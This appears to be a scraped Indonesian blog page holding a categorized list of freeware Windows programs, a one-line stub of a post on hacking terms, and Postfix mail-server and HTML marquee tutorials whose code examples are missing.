Free Download Manager - download manager
FlashGet - download manager
WellGet - download manager
Download Master - download manager
WGET - commandline download manager
HTTrack - offline browser
WebReaper - offline browser
Yeah Reader - RSS reader
GreatNews - RSS reader
RSSOwl - RSS reader
P2P
µTorrent - torrent client
Azureus - torrent client
BitComet - torrent client
ABC - torrent client
BitTornado - torrent client
eMule - p2p client
SoulSeek - p2p client
Shareaza - p2p client
DC++ - Direct Connect network client
PeerGuardian - IP blocker
Chat
Miranda - chat client
MSN Messenger - chat client
Yahoo Messenger - chat client
QIP - chat client
Gaim - chat client
JAJC - chat client
HydraIRC - IRC client
Talkative IRC - IRC client
IceChat - IRC client
Skype - VOIP client
Google Talk - VOIP client
VoipStunt - VOIP client
Gizmo - VOIP client
Wengo - VOIP client
Security
AVG Free - antivirus
Avast Home Free - antivirus
AntiVir PersonalEdition - antivirus
BitDefender Free - antivirus
ClamWin - antivirus
CyberDifender - Internet Security Suite
Ad-aware - anti-spyware
Spybot: Search & Destroy - anti-spyware
Windows Defender - anti-spyware
SpywareBlaster - anti-spyware
Spyware Terminator - anti-spyware
Tootkit Reveaker - rootkit detection utility
Winpooch - system protection
HiJack Free - system protection
HighJackThis - hijackers detector and remover
Kerio Personal Firewall - firewall
Sygate Personal Firewall - firewall
ZoneAlarm - firewall
AxCrypt - file encryption
Simple File Shredder - securely delete files
PuTTy - SSH client
KeePass - password manager
LockNote - password manager
nPassword - password manager
Microsoft Baseline Security Analyzer - identify security misconfigurations
Network
Hamachi - VPN client
RealVNC - remote control
UltraVNC - remote control
Ethereal - local area network administration
The Dude - network administration
Wireshark - network administration
Angry IP Scanner - IP scanner
IP-Tools - IP scanner
Free Port Scanner - IP scanner
NetMeter - network bandwidth monitoring
Servers
FileZilla - FTP client
FileZilla Server - FTP server
EFTP - FTP client/server
XAMPP - integrated server package of Apache, mySQL, PHP and Perl
WAMP - Apache, PHP5 and MySQL server
Audio
Foobar2000 - audio player
WinAmp - audio player
1by1 - audio player
JetAudio - audio player
XMPlay - audio player
Xion - audio player
Apollo - audio player
MediaMonkey - music organizer
The GodFather - music organizer
dBpowerAMP - audio converter
Audacity - audio converter
WavePad - audio converter
Kristal Audio Engine - audio editor
Exact Audio Copy - CD ripper
Audiograbber - CD ripper
CDex - CD ripper
Mp3 Tag Tools - tag editor
Mp3tag - tag editor
Taggin’ MP3 - tag editor
Monkey’s Audio - APE compressor/decompressor
mpTrim - mp3 editor
WavTrim - wave editor
EncSpot Basic - analyse mp3 files
Video
Windows Media Player - audio/video player
VLC - video player
Media Player Classic - video player
MV2Player - video player
CrystalPlayer 1.95 - video player
Zoom Player - video player
GOM Player - video player
viPlay - video player
DSPlayer - video player
VirtualDub - video editor
CamStudio - video screen recording
AviSplit - Avi splitter
Video mp3 Extractor - rip audio from video files
Free iPod Converter - convert all popular video formats to iPod video
MediaPortal - turning your PCinto a Media Center
The FilmMachine
Image
Gimp - image editor
PhotoFiltre - image editor
Paint.net - image editor
ArtRage - image editor
Artweaver - image editor
IrfanView - image viewer
Picasa - image viewer
XnView - image viewer
FastStone Image Viewer - image viewer
FuturixImager - image viewer
Easy Thumbnails - create thumbnails from images
JoJoThumb - create thumbnails from images
iWebAlbum - create web photo albums
JAlbum - create web photo albums
3D Box Shot Maker - design quality box shot
FastStone Capture - screen capture
WinSnap - screen capture
3D
Blender3D - 3D renderer
3Delight Free - 3D renderer
SketchUp - 3D modeling
Maya Learning Edition - 3D modeling
Developers
AutoIt - task automation
SciTE4AutoIt3 - text editor for AutoIt
AutoHotkey - task automation
PHP Designer - PHP editor
Notepad++ - text editor
ConTEXT Editor - text editor
PSPad - text editor
FoxEditor - text editor
Crimson Editor - source code editor
Elfima Notepad - text editor
Notepad2 - text editor
Nvu - HTML editor
Alleycode - HTML editor
BlockNote - web page editor
Weaverslave - web page editor
CD/DVD
DeepBurner - CD/DVD burner
CDBurner XP Pro - CD/DVD burner
BurnAtOnce - CD/DVD burner
Express Burn - CD/DVD burner
Zilla CD-DVD Rip’n’Burn - CD/DVD burner
ImgBurn - ISO, BIN burner
Daemon tools - virtual CD/DVD
DVD Decrypter - DVD ripper
DVD Shrink - DVD ripper
Nero CD-DVD Speed - CD/DVD info and quality test
Codecs
GSpot - codec information
AC3Filter - audio codec
Xvid - video codec
QuickTime Alternative - video codec
Real Alternative - video codec
K-Lite Codec Pack - all codecs
System Ulilities
CCleaner - system cleaner
xp-AntiSpy - OS setup
jv16 Powertools - system utilities
XP SysPad - system monitoring utility
What’s Running - process guard
Registrar Lite - registry editor
WinIPConfig - replacement for “ipconfig.exe” and “route.exe”
Unlocker - file eraser
Eraser - secure file eraser
Undelete Plus - file recovery
freeCommander - file manager
ExplorerXP - file manager
Duplicate File Finder - find all duplicate files
Ant Renamer - file renaming
ReNamer - file renaming
Icons From File - icos extractor
Chaos MD5 - MD5 generator
HashTab - MD5, SHA1 and CRC-32 file hashes
Rainlendar Lite - desktop calendar
Weather Watcher - weather firecast
Subtitle Workshop - subtitles editor
Ant Movie Catalog - movie organizer
Disclib - CD organizer
Dexpot - virtual desktops
DriveImage XML - create partition images
MozBackup - backup and restore bookmarks, etc.
SyncBack - system backup
Atomic Cock Sync - syncronize your clock
Citrus Alarm Clock - alarm clock
TaskSwitchXP - Alt-Tab replacement
Launchy - application launcher
allSnap - make all windows snap
Sysinternals Tools - various system tools
StrokeIt - mouse gestures
Net Profiles - create profiles of your network settings
ResourceHacker - view, modify, rename, add, delete
Java Runtime Environment - java for Windows
UI Enhancements
RocketDock - application launcher
AveDesk - desktop enhancer
IconPhile - customize windows’s system icons
CursorXP Free - change mouse cursors
MacSound - volume control
LClock - Windows Longhorn clock
Y’z Dock - application launcher
Y’z Shadow - shadow effect to the windows
Y’z Toolbar - change the toolbar icons in Explorer and Internet Explorer
Taskbar Shuffle - rearrange the programs on the taskbar by dragging
Visual Task Tips - thumbnail preview image for each task in the taskbar
Badges - put badges on any folder or file
Folderico - change icons of the folders
Folder Marker - mark your folders
Folder2MyPC - add favourite locations to My Computer
Microsoft TweakUI - system settings
BricoPacks - shell packs
ShellPacks - shell packs
Tango Shell Patcher - shell patcher
XPize - GUI enhancer
Vista Transformation Pack - complete visual style
Vista Sound Scheme - Windows Vista sound scheme
Royale Theme - visual style
HW monitoring
CPU-Z - cpu information
CrystalCPUID - cpu information
Central Brain Identifier - cpu information
Everest - system information
SiSoft Sandra - system information
SpeedFan - hardware monitor
Memtest86 - memory test
PowerMax - HDD test
3Dmark 06 - 3D game performance benchmark
Aquamark - performance benchmark
rthdribl - 3D benchmark
Fraps - 3D benchmark, fps viewer and screen recorder
Prime 95 - cpu benchmarking
SuperPI - cpu benchmarking
CPU Rightmark - cpu overclock
Core Temp - cpu temperature
ATiTool - video overclock
ATI Tray Tools - Radeon tweaker
aTuner - GeForce and Radeontweaker
RivaTuner - video overclock
Nokia Monitor Test - monitor adjustmets
UDPixel - fix dead pixels
Games
123 Free Solitaire - solitaire games collection
Arcade Pack - classic arcade games
Live For Speed - online racing simulator
Enigma - puzzle game
Freeciv - multiplayer strategy game
Tux Racer - race down steep, snow-covered mountains
Education
SpeQ Mathematics - mathematics program
Dia - diagram creation program
Google Earth - explore the world
NASA World Wind - 3D virtual globe
Celestia - explore the space
Stellarium - planetarium
Miscellaneous
nLite - Build your own custom Windows disk.
VirtualPC - create virtual machines
grabMotion - webcam capture
iDailyDiary - simple page-for-a-day diary
Pivot Stickfigure Animator - create stick-figure animations
Wink - create presentations
Scribus - professional page layout
FreeMind - midn mapping software
Windows Live Writer - WYSIWYG blog authoring
Sumber maztikno
Dipublikasi pada Saturday, 07 July 2007 oleh webmaster - Saturday, 07 July 2007 -
Meneeruskan baca......
Jumat, 08 Januari 2010
Istilah hacking
Eksploit, Trapdoor, Backdoor, dan Trojan Horse dijelaskan
oleh Ganjaman dan SuperCock [members of IndoHack]
Meneeruskan baca......
Konfigurasi PostfixTSL (Trustix Secure Linux) 3.0
Bagaimana Postfix bekerja
Instalasi dan aktivasi Postfix
Kofigurasi Postfix
Konfigurasi dasar
Postfix sebagai mail server Intranet
Postfix sebagai mail host lokal dalam intranet
Postfix di mesin dialup
Saat anda mengirimkan email, Postfix akan menempatkannya dalam antrian, dan dapat dipaksa untuk mengirimkan (flush the queue), dengan menjalankan perintah :
Jangan lupa untuk menjalankan ulang postfix setelah anda mengubah konfigurasinya. Virtual Domain dan aliases
Virtual Domain
Edit file /etc/postfix/virtual dengan sintaks :
Dari keterangan di atas, berarti secara default, semua user di real domain, punya alamat juga di virtual domain. Kemudian di baris kedua, dapat pula ditambahkan, user tertentu akan diteruskan ke alamat tertentu. Dalam contoh diatas, setiap email yang tertuju ke user@virtual.domain akan diteruskan ke sofyan@real.domain dan root@real.domain.
Kemudian restart postfix untuk memastikan virtual domain telah aktif. Aliases
Setelah itu edit file /etc/postfix/aliases, tambahkan beberapa baris alias.
Selesai edit file tersebut, jalankan perintah newaliases untuk memasukkan alias baru ke dalam postfix, dan setelah itu reload postfix-nya. POP3 Server
Pengujian
Test kirim kepada user lokal
Test terima dari user lokal
Test terima dan kirim dari host lain
Di ambil dari
Modul Postfix
Copyright © 1997, 1998, 1999, Ross Moore, Mathematics Department, Macquarie University, Sydney.
latex2html postfix.tex
Meneeruskan baca......
Sabtu, 23 Januari 2010
atau kode
dan
7. Bgcolor : Untuk mengatur warna background, seperti: "black", "green", "blue", "red", "white", pink, "yellow", dan lain-lain. Jika Anda ingin menghilangkan warna background anda gunakan"transparent"
Bila anda hanya sekedar ingin membuat suatu object seperti teks ataupun gambar bergerak ke kiri, kanan, atas dan bawah. tanpa memerlukan background, ukuran, warna dan lain-lain. misalnya anda ingin membuat sebuah tulisan bergerak kekiri, maka anda cukup menggunakan kode seperti contoh dibawah ini.
Kode diatas hanya menggunakan 1 attribut dari efek marquee, yaitu Direction yang berfungsi untuk menentukan arah gerakan saja. bila anda ingin membuat animasi teks tersebut dengan tampilan yang bisa di atur sesuai keinginan anda. maka anda perlu menambahkan beberapa attribut efek marquee lainnya. misalnya seperti contoh dibawah ini.
Untuk membuat bentuk tampilan animasi teks seperti pada contoh gambar di atas. anda harus menambahkan beberapa attribut seperti font face untuk jenis teks, size untuk ukuran teks dan lainnya. seperti pada kode dibawah ini yaitu untuk tampilan animasi teks di pada contoh atas.
Merah
Kuning
Hijau Muda
Hijau Tua
Merah Muda/Pink
Ungu
Biru Muda
Biru Tua
Coklat
Orange
Hitam
Absolutely Putih
Langganan:
Postingan (Atom)